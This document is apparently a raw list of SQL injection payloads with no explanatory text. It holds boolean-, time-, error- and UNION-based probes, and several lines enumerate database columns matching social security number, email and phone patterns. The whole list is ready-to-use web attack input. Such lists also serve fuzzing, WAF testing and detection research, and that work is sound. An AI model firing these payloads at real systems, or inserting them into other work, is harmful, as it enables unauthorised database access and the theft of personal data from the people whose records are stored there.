59)) AND 3233 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3233=3233) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113))) AND ((7797=7797
59)) AND 5376=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5376=5376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113))) AND ((8738=8738
59")) AND 5376=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5376=5376) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113))) AND (("iMXw"="iMXw
59 AND 6623=CONCAT(CHAR(113)+CHAR(98)+CHAR(98)+CHAR(106)+CHAR(113),(SELECT (CASE WHEN (6623=6623) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113))-- CAQC
288 && 1=2 uNiON all SEleCT  1,2,3,CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 FroM information_schema.COLUMNS WHERE `COLUMN_NAME` LIKE char(37,115,111,99,105,97,108,95,115,101,99,117,114,105,116,121,95,110,117,109,98,101,114,37) && ( DATA_TYPE=char(99,104,97,114) ||DATA_TYPE=char(118,97,114,99,104,97,114) ||DATA_TYPE=char(116,101,120,116)) #
288 && 1=2 uNiON all SEleCT 1,2,3,CONCAT(CHAR(91,88,93),count(*),CHAR(91,88,93)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 FroM information_schema.COLUMNS WHERE `COLUMN_NAME` LIKE char(37,115,111,99,105,97,108,45,115,101,99,117,114,105,116,121,45,110,117,109,98,101,114,37) && ( DATA_TYPE=char(99,104,97,114) ||DATA_TYPE=char(118,97,114,99,104,97,114) ||DATA_TYPE=char(116,101,120,116)) #
211111111111111111111111111 UNION SELECT CONCAT(CHAR(100,100,100),CHAR(91,88,93),COLUMN_NAME,CHAR(91,88,88,93)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM information_schema.COLUMNS  WHERE `TABLE_NAME`=char(105,100,95,111,110,108,105,110,101) AND `TABLE_SCHEMA`=char(110,97,98,97,107,101,109) AND `COLUMN_NAME` LIKE char(37,112,104,111,110,37)  limit 0,1 --
 AND 3201=BENCHMARK(5000000,MD5(0x4e554353))
 AND 6646=BENCHMARK(5000000,MD5(0x4f674372))#
 211111111111111111111111111 UNION SELECT CONCAT(CHAR(100,100,100),CHAR(91,67,79,76,85,77,78,95,78,65,77,69,93),COLUMN_NAME,CHAR(91,67,79,76,85,77,78,95,78,65,77,69,93),CHAR(91,84,65,66,76,69,95,78,65,77,69,93),TABLE_NAME,CHAR(91,84,65,66,76,69,95,78,65,77,69,93),CHAR(91,84,65,66,76,69,95,83,67,72,69,77,65,93),TABLE_SCHEMA,CHAR(91,84,65,66,76,69,95,83,67,72,69,77,65,93)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM information_schema.COLUMNS WHERE `COLUMN_NAME` LIKE char(37,109,97,105,108,37) AND ( `DATA_TYPE`=char(99,104,97,114) OR `DATA_TYPE`=char(118,97,114,99,104,97,114) OR `DATA_TYPE`=char(116,101,120,116))  limit 4,1 --
 AND ROW(4115,7844)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(4115=4115,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 9757 UNION SELECT 8982 UNION SELECT 5308 UNION SELECT 5233)a GROUP BY x)
 AND SLEEP(5)
 AND SLEEP(5)#
 2 AnD BeNChMaRK(2999999,MD5(NOW()))
 292_f1_890.pdf'||SLeeP(3)&&'1
 292_f1_890.pdf'&&BeNChMaRK(2999999,mD5(NOW()))&&'1
 OR 4263=BENCHMARK(5000000,MD5(0x517a7044))#
 OR 9738=BENCHMARK(5000000,MD5(0x5a7a584d))
 OR ROW(5565,7011)>(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(5565=5565,1))),0x7176767871,FLOOR(RAND(0)*2))x FROM (SELECT 8025 UNION SELECT 2135 UNION SELECT 1291 UNION SELECT 2570)a GROUP BY x)
 OR SLEEP(5)
 OR SLEEP(5)#
 PROCEDURE ANALYSE(EXTRACTVALUE(2799,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x41415763))))),1)#
 UNION ALL SELECT NULL#
%' AND 3428=3428 AND '%'='
%' AND 3460=7535 AND '%'='
%') AND 3428=3428 AND ('%'='
%') AND 5133=6778 AND ('%'='
%')) AND 3428=3428 AND (('%'='
%')) AND 6942=4647 AND (('%'='
%'))) AND 3428=3428 AND ((('%'='
%'))) AND 7735=3082 AND ((('%'='
%\" AND 3428=3428 AND \"%\"=\"
%\" AND 7772=8693 AND \"%\"=\"
%\") AND 2921=9820 AND (\"%\"=\"
%\") AND 3428=3428 AND (\"%\"=\"
%\")) AND 3428=3428 AND ((\"%\"=\"
%\")) AND 3538=2871 AND ((\"%\"=\"
%\"))) AND 1868=7345 AND (((\"%\"=\"
%\"))) AND 3428=3428 AND (((\"%\"=\"
' AND 2353=8039-- HKuw
' AND 3428=3428 AND 'UXQG'='UXQG
' AND 3428=3428 AND 'XXPS' LIKE 'XXPS
' AND 3428=3428-- jSyW
' AND 4786=4963 AND 'IIVq' LIKE 'IIVq
' AND 5103=4169 AND 'CEYB'='CEYB
' IN BOOLEAN MODE) AND 3428=3428#
' IN BOOLEAN MODE) AND 4810=4637#
' WHERE 4925=4925 AND 1281=7105-- OCdK
' WHERE 5527=5527 AND 3428=3428-- QxBN
') AND 3428=3428 AND ('QGry'='QGry
') AND 3428=3428 AND ('aSyd' LIKE 'aSyd
') AND 3428=3428-- gvQa
') AND 6605=1377 AND ('JIdw' LIKE 'JIdw
') AND 7243=2534-- taRo
') AND 9004=6342 AND ('JrgK'='JrgK
') AS FQiL WHERE 1049=1049 AND 3428=3428-- HZVD
') AS ppIf WHERE 1485=1485 AND 5309=7046-- MaPc
') WHERE 1915=1915 AND 2790=6850-- NxGl
') WHERE 3127=3127 AND 3428=3428-- iXPf
')) AND 3428=3428 AND (('QVZM' LIKE 'QVZM
')) AND 3428=3428 AND (('prMo'='prMo
')) AND 6592=4406 AND (('TNBh'='TNBh
')) AND 8668=5199 AND (('UfmJ' LIKE 'UfmJ
')) AS fCwE WHERE 4544=4544 AND 3428=3428-- hXqu
')) AS zBuN WHERE 7787=7787 AND 5707=4217-- CvEV
'))) AND 1261=4548 AND ((('drOJ' LIKE 'drOJ
'))) AND 3428=3428 AND ((('nTmW'='nTmW
'))) AND 3428=3428 AND ((('qqnB' LIKE 'qqnB
'))) AND 4710=6201 AND ((('miMg'='miMg
'+(SELECT 'EyCS' WHERE 7982=7982 AND 3428=3428)+'
'+(SELECT 'Pnum' WHERE 5556=5556 AND 4197=7093)+'
'+(SELECT iMvr WHERE 7812=7812 AND 1097=2197)+'
'+(SELECT tmkn WHERE 3447=3447 AND 3428=3428)+'
'||(SELECT 'RrRW' FROM DUAL WHERE 3356=3356 AND 3428=3428)||'
'||(SELECT 'TGdV' WHERE 1475=1475 AND 1972=6825)||'
'||(SELECT 'awWe' FROM DUAL WHERE 9237=9237 AND 9715=3710)||'
'||(SELECT 'occp' WHERE 7313=7313 AND 3428=3428)||'
(CASE WHEN ((9834)=9834) THEN 8896 ELSE 8896*(SELECT 8896 FROM DUAL UNION SELECT 2167 FROM DUAL) END)
(CASE WHEN (4325=4325) THEN SLEEP(0) ELSE 4325 END)
(CASE WHEN (4325=4325) THEN SLEEP(5) ELSE 4325 END)
(CASE WHEN (4325=4325) THEN SLEEP(5) ELSE 4325 END)
(CASE WHEN (49=49) THEN 9993 ELSE 9993*(SELECT 9993 FROM DUAL UNION SELECT 9801 FROM DUAL) END)
(CASE WHEN (49=98) THEN 9190 ELSE 9190*(SELECT 9190 FROM DUAL UNION SELECT 3909 FROM DUAL) END)
(CASE WHEN (5050=6797) THEN 5050 ELSE 5050*(SELECT 5050 FROM DUAL UNION SELECT 6797 FROM DUAL) END)
(CASE WHEN (55=55) THEN 4222 ELSE 4222*(SELECT 4222 FROM DUAL UNION SELECT 6872 FROM DUAL) END)
(CASE WHEN (55=96) THEN 7201 ELSE 7201*(SELECT 7201 FROM DUAL UNION SELECT 4493 FROM DUAL) END)
(CASE WHEN (56=56) THEN 9282 ELSE 9282*(SELECT 9282 FROM DUAL UNION SELECT 3931 FROM DUAL) END)
(CASE WHEN (6775=8265) THEN 1 ELSE 6775*(SELECT 6775 FROM DUAL UNION SELECT 8265 FROM DUAL) END)
(CASE WHEN (67=67) THEN 5149 ELSE 5149*(SELECT 5149 FROM DUAL UNION SELECT 2826 FROM DUAL) END)
(CASE WHEN (6804=6804) THEN 6804 ELSE 6804*(SELECT 6804 FROM DUAL UNION SELECT 6093 FROM DUAL) END)
(CASE WHEN (68=68) THEN 9310 ELSE 9310*(SELECT 9310 FROM DUAL UNION SELECT 7257 FROM DUAL) END)
(CASE WHEN (69=68) THEN 5738 ELSE 5738*(SELECT 5738 FROM DUAL UNION SELECT 5017 FROM DUAL) END)
(CASE WHEN (76=33) THEN 9207 ELSE 9207*(SELECT 9207 FROM DUAL UNION SELECT 5131 FROM DUAL) END)
(CASE WHEN (92=39) THEN 5600 ELSE 5600*(SELECT 5600 FROM DUAL UNION SELECT 8228 FROM DUAL) END)
(CASE WHEN (96=56) THEN 3754 ELSE 3754*(SELECT 3754 FROM DUAL UNION SELECT 6851 FROM DUAL) END)
(CASE WHEN (9835>9834) THEN 4729 ELSE 4729*(SELECT 4729 FROM DUAL UNION SELECT 2650 FROM DUAL) END)
(CASE WHEN (98=67) THEN 4452 ELSE 4452*(SELECT 4452 FROM DUAL UNION SELECT 7043 FROM DUAL) END)
(CASE WHEN (ISNULL(TIMESTAMPADD(MINUTE,7127,NULL))) THEN 7127 ELSE 7127*(SELECT 7127 FROM DUAL UNION SELECT 7079 FROM DUAL) END)
(CASE WHEN (QUARTER(NULL) IS NULL) THEN 7441 ELSE 7441*(SELECT 7441 FROM DUAL UNION SELECT 3740 FROM DUAL) END)
(CASE WHEN (SESSION_USER() LIKE USER()) THEN 1761 ELSE 1761*(SELECT 1761 FROM DUAL UNION SELECT 7208 FROM DUAL) END)
(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 7084 ELSE 7084*(SELECT 7084 FROM DUAL UNION SELECT 7992 FROM DUAL) END)
(CASE WHEN 1053=8888 THEN 1053 ELSE NULL END)
(CASE WHEN 3697=3697 THEN 3697 ELSE NULL END)
(CASE WHEN 4452=4452 THEN 1 ELSE NULL END)
(CASE WHEN 6897=8192 THEN 1 ELSE NULL END)
(EXTRACTVALUE(9068,CONCAT(0x5c,0x717a786271,(SELECT (ELT(9068=9068,1))),0x7176767871)))
(SELECT (CASE WHEN (1162=1162) THEN 1 ELSE 1162*(SELECT 1162 FROM INFORMATION_SCHEMA.PLUGINS) END))
(SELECT (CASE WHEN (1245=9264) THEN 1 ELSE 1245 END) FROM SYSMASTER:SYSDUAL)
(SELECT (CASE WHEN (1277=1277) THEN 1277 ELSE 1277*(SELECT 1277 FROM mysql.db) END))
(SELECT (CASE WHEN (1359=1359) THEN 1 ELSE 1359*(SELECT 1359 UNION ALL SELECT 5058) END))
(SELECT (CASE WHEN (1619=1619) THEN 1619 ELSE 1619*(SELECT 1619 FROM INFORMATION_SCHEMA.PLUGINS) END))
(SELECT (CASE WHEN (1649=1649) THEN 1649 ELSE 1649*(SELECT 1649 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
(SELECT (CASE WHEN (1650=7227) THEN 1650 ELSE 1650*(SELECT 1650 FROM mysql.db) END))
(SELECT (CASE WHEN (1910=5478) THEN 1 ELSE 1/(SELECT 0) END))
(SELECT (CASE WHEN (2362=2362) THEN 1 ELSE 2362*(SELECT 2362 FROM INFORMATION_SCHEMA.PLUGINS) END))
(SELECT (CASE WHEN (2842=8491) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN (3603=8835) THEN 3603 ELSE 1/(SELECT 0) END))
(SELECT (CASE WHEN (3696=3696) THEN 3696 ELSE 3696*(SELECT 3696 UNION ALL SELECT 8613) END))
(SELECT (CASE WHEN (4228=4228) THEN 1 ELSE 4228*(SELECT 4228 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
(SELECT (CASE WHEN (4727=5501) THEN 4727 ELSE 4727*(SELECT 4727 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
(SELECT (CASE WHEN (4895=3801) THEN 1 ELSE 4895*(SELECT 4895 UNION ALL SELECT 3801) END))
(SELECT (CASE WHEN (4915=7350) THEN 4915 ELSE 4915*(SELECT 4915 FROM INFORMATION_SCHEMA.PLUGINS) END))
(SELECT (CASE WHEN (4949=3822) THEN 1 ELSE 4949*(SELECT 4949 FROM INFORMATION_SCHEMA.PLUGINS) END))
(SELECT (CASE WHEN (5315=7990) THEN 5315 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN (5511=5511) THEN 5511 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN (5801=5801) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
(SELECT (CASE WHEN (6033=6033) THEN 1 ELSE 6033 END) FROM SYSMASTER:SYSDUAL)
(SELECT (CASE WHEN (6105=6105) THEN 1 ELSE 6105*(SELECT 6105 FROM mysql.db) END))
(SELECT (CASE WHEN (6133=6023) THEN 1 ELSE 6133*(SELECT 6133 FROM mysql.db) END))
(SELECT (CASE WHEN (6423=6572) THEN 6423 ELSE 6423*(SELECT 6423 FROM INFORMATION_SCHEMA.PLUGINS) END))